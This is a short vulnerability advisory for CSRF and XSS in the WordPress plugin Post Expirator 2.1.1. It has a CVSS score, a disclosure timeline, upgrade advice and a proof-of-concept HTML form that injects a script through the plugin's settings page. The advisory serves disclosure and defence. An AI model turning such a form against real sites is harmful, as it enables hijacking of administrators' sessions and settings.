CSRF and XSS in Post Expirator 2.1.1

Vulnerability

Last revised: February 18, 2014

A lack of output escaping and safe request processing allows CSRF and XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	7.5 High
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	Partial

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=post-expirator.php">
  <input type="text" name="expired-default-date-format" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="expirationdateSave" value="kthxbai">
  <input type="submit">
</form>

Advisory timeline

2013-12-18 Discovered
2014-02-18 Reported to plugins@wordpress.org
2014-03-17 Updated version has appeared on the codex which reports issue fixed.

Mitigation/further actions

Upgrade immediately.

dxw advisories

Advisory: